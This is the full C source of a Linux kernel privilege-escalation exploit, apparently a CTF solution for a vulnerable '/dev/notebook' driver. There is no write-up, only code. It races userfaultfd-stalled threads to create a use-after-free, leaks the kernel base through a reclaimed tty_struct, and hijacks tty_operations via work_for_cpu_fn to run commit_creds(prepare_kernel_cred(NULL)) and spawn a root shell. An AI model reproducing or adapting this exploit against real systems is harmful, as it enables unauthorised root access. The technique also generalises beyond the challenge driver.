1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205
| #define _GNU_SOURCE #include <sys/types.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/sem.h> #include <sched.h> #include <pthread.h> #include "kernelpwn.h"
#define SUCCESS_MSG(msg) "\033[32m\033[1m[+] " msg "\033[0m" #define INFO_MSG(msg) "\033[34m\033[1m[*] " msg "\033[0m" #define ERROR_MSG(msg) "\033[31m\033[1m[x] " msg "\033[0m"
#define log_success(msg) puts(SUCCESS_MSG(msg)) #define log_info(msg) puts(INFO_MSG(msg)) #define log_error(msg) puts(ERROR_MSG(msg))
#define TTY_STRUCT_SIZE 0x2e0 #define PTY_UNIX98_OPS 0xffffffff81e8e320 #define PTM_UNIX98_OPS 0xffffffff81e8e440
#define WORK_FOR_CPU_FUNC 0xffffffff8109eb90 #define PREPARE_KERNEL_CRED 0xffffffff810a9ef0 #define COMMIT_CREDS 0xffffffff810a9b40
#define NOTE_NUM 16
struct UserArg { size_t idx; size_t size; char *name_ptr; }userarg;
struct KernelNotebook { void *ptr; size_t size; };
int dev_fd; sem_t evil_add_sem, evil_edit_sem; char temp_page[0x1000] = {"eutopia0"}; char * uffd_buf;
void note_add(size_t index, size_t size, char *name_ptr) { struct UserArg userarg = { .idx = index, .size = size, .name_ptr = name_ptr }; ioctl(dev_fd, 0x100, &userarg); }
void gift(char *name_ptr) { struct UserArg userarg = { .name_ptr = name_ptr }; ioctl(dev_fd, 0x64, &userarg); }
void note_del(size_t index) { struct UserArg userarg = { .idx = index }; ioctl(dev_fd, 0x200, &userarg); }
void note_edit(size_t index, size_t size, char *name_ptr) { struct UserArg userarg = { .idx = index, .size = size, .name_ptr = name_ptr }; ioctl(dev_fd, 0x300, &userarg); }
ssize_t note_read(int idx, void *buf) { return read(dev_fd, buf, idx); }
ssize_t note_write(int idx, void *buf) { return write(dev_fd, buf, idx); }
void fix_size(void * args) { sem_wait(&evil_add_sem); note_add(0, 0x60, uffd_buf); }
void construct_uaf(void * args) { sem_wait(&evil_edit_sem); note_edit(0, 0, uffd_buf); }
int main() { bind_core(0); save_status();
struct KernelNotebook notes[NOTE_NUM]; int tty_fd; struct tty_operations fake_tty_ops; pthread_t uffd_monitor_thread, add_fix_size_thread, edit_uaf_thread; size_t fake_tty_struct_data[0x100], tty_ops, orig_tty_struct_data[0x100]; size_t tty_struct_addr, fake_tty_ops_addr; struct UserArg userarg;
sem_init(&evil_add_sem, 0, 0); sem_init(&evil_edit_sem, 0, 0);
dev_fd = open("/dev/notebook", O_RDWR); if (dev_fd <= 0) { printf("[x] open device failed!\n"); return -1; } printf("[*] open device success!\n");
log_info("Step1: construct UAF by userfaultfd"); note_add(0, 0x10, "eutopia0"); note_edit(0, TTY_STRUCT_SIZE, temp_page);
uffd_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); register_userfaultfd_for_thread_stucking(&uffd_monitor_thread, uffd_buf, 0x1000);
pthread_create(&edit_uaf_thread, NULL, (void *)construct_uaf, NULL); pthread_create(&add_fix_size_thread, NULL, (void *)fix_size, NULL);
sem_post(&evil_edit_sem); sleep(1); sem_post(&evil_add_sem); sleep(1); log_info("Step2: Leaking kernel base by tty_struct"); tty_fd = open("/dev/ptmx", O_RDWR); note_read(0, orig_tty_struct_data); if (*(int *) orig_tty_struct_data != 0x5401) { err_exit("failed to hit the tty_struct!"); }
tty_ops = orig_tty_struct_data[3]; kernel_offset = ((tty_ops & 0xfff) == (PTY_UNIX98_OPS & 0xfff) ? (tty_ops - PTY_UNIX98_OPS) : tty_ops - PTM_UNIX98_OPS); kernel_base += kernel_offset;
printf("[*] Kernel offset: 0x%lx\n", kernel_offset); printf("[+] Kernel base: 0x%lx\n", kernel_base);
fake_tty_ops.ioctl = (void *)(kernel_offset + WORK_FOR_CPU_FUNC); note_add(1, 0x50, temp_page); note_edit(1, sizeof(struct tty_operations), temp_page); note_write(1, &fake_tty_ops);
log_info("Step3: Leaking Kernel heap addr by gift..."); gift((char *)¬es); tty_struct_addr = (size_t) notes[0].ptr; fake_tty_ops_addr = (size_t) notes[1].ptr;
printf("[+] tty_struct addr: 0x%lx\n", tty_struct_addr); printf("[+] fake_tty_ops_addr: 0x%lx\n", fake_tty_ops_addr);
log_info("Step3: Trigger commit_creds(prepare_kernel_cred(NULL)) and fix tty"); memcpy(fake_tty_struct_data, orig_tty_struct_data, TTY_STRUCT_SIZE); fake_tty_struct_data[3] = fake_tty_ops_addr; fake_tty_struct_data[4] = kernel_offset + PREPARE_KERNEL_CRED; fake_tty_struct_data[5] = 0;
note_write(0, fake_tty_struct_data);
ioctl(tty_fd, 233, 233);
note_read(0, fake_tty_struct_data); fake_tty_struct_data[4] = kernel_offset + COMMIT_CREDS; fake_tty_struct_data[5] = fake_tty_struct_data[6]; fake_tty_struct_data[6] = orig_tty_struct_data[6];
note_write(0, fake_tty_struct_data); ioctl(tty_fd, 233, 233); memcpy(fake_tty_struct_data, orig_tty_struct_data, TTY_STRUCT_SIZE); note_write(0, fake_tty_struct_data);
get_root_shell();
return 0; }
|